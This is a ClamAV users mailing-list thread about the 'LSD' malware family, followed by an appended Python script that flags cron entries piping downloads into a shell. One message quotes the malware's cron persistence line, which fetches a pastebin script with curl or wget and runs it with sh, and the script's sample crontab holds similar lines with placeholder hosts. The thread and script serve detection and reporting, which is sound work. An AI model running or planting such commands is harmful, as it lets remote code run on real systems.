[clamav-users] LSD Malwares
Xavier Maysonnave
x.maysonnave at gmail.com
Sat Apr 27 05:00:12 UTC 2019
Hi Joel,
Thanks for your action.
I also opened a request @ Cloudflare.
https://support.cloudflare.com/hc/requests/1677155
This ticket is not public, though it could be useful to forward its
reference to your Cloudflare contact.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
On Fri, Apr 26, 2019 at 22:18, Joel Esler (jesler) <jesler at cisco.com>
wrote:
> Dear ClamAV-users,
>
> I reached out to my contacts at Cloudflare to take action.
>
>
> --
> Joel Esler
> Manager, Communities Division
> Cisco Talos Intelligence Group
> http://www.talosintelligence.com
>
> On Apr 25, 2019, at 11:25 PM, Xavier Maysonnave via clamav-users <
> clamav-users at lists.clamav.net> wrote:
>
> Hi All,
>
> Thanks for your feedback.
> I'm going to report this URL to Cloudflare.
>
> However, keep in mind that there are other URLs that are involved in this
> family.
> */10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
> https://pastebin.com/raw/wR3ETdbi)|sh
> This one targets Jenkins, another popular open-source tool, not used on our
> infrastructure though.
>
> I'm still very interested in the consequences of this malware. Any
> hints will be greatly appreciated.
>
> Thanks.
>
> Light
>
> Pudhuveedu / Xavier
>
> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>
>
> On Fri, Apr 26, 2019 at 08:03, Dave Warren via clamav-users <
> clamav-users at lists.clamav.net> wrote:
>
>> The same applies: Report it. Cloudflare will either forward the
>> complaint for you, or block the offending URL (or both).
>>
>> On 2019-04-25 19:16, Dennis Peterson wrote:
>> > That domain is hosted on a Cloudflare IP block. They've become part of
>> > the problem.
>> >
>> > dp
>> >
>> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>> >> hosting provider & domain registrar that they are hosting malware and
>> >> get that site shut down...
>> >>
>>
>> _______________________________________________
>>
>> clamav-users mailing list
>> clamav-users at lists.clamav.net
>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>
>>
>> Help us build a comprehensive ClamAV guide:
>> https://github.com/vrtadmin/clamav-faq
>>
>> http://www.clamav.net/contact.html#ml
>>
>
>
>
>
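
A defender-side check for the persistence pattern in the cron entry quoted in this thread (a scheduled job that fetches a remote script and pipes it to `sh`), added here as an example and not part of any poster's message or of ClamAV. The function names, the regular expression and the sample crontab with placeholder URLs are constructed assumptions.

```python
import re

# A download command, and a shell that would execute whatever it is fed.
FETCH = r"\b(?:curl|wget)\b[^|;&]*"
SHELL = r"(?:/(?:usr/)?bin/)?(?:ba|da|z|k)?sh\b"
# One fetch, or a "(a||b)" fallback group of fetches, piped into a shell.
PIPE_TO_SHELL = re.compile(
    rf"\(?\s*{FETCH}(?:\|\|\s*{FETCH})*\)?\s*\|\s*(?:sudo\s+)?{SHELL}"
)

# Constructed sample crontab; every URL is a placeholder.
SAMPLE_CRONTAB = """\
# constructed sample
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * (curl -fsSL https://paste.example.invalid/raw/XXXX||wget -q -O- https://paste.example.invalid/raw/XXXX)|sh
@reboot curl -s https://example.invalid/i.sh | bash
15 2 * * 0 wget -q -O /tmp/list.txt https://example.invalid/list.txt
30 4 * * * curl -s https://example.invalid/f.tgz | sha256sum
"""

def split_cron_line(line):
    """Return (schedule, command), or None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*\s*=", line):
        return None
    nfields = 1 if line.startswith("@") else 5   # "@reboot" style vs. five time fields
    parts = line.split(None, nfields)
    if len(parts) <= nfields:
        return None                               # schedule without a command
    return " ".join(parts[:nfields]), parts[nfields]

def find_fetch_pipe_shell(crontab_text):
    """Return (line number, schedule, command) for entries that pipe a download to a shell."""
    hits = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        entry = split_cron_line(raw)
        if entry and PIPE_TO_SHELL.search(entry[1]):
            hits.append((lineno, entry[0], entry[1]))
    return hits

if __name__ == "__main__":
    for lineno, schedule, command in find_fetch_pipe_shell(SAMPLE_CRONTAB):
        print(f"line {lineno}: [{schedule}] {command}")
```

Feed it the output of `crontab -l` for each user and the files under /etc/cron.d; in system crontabs the user field stays in the command text, which does not affect the match.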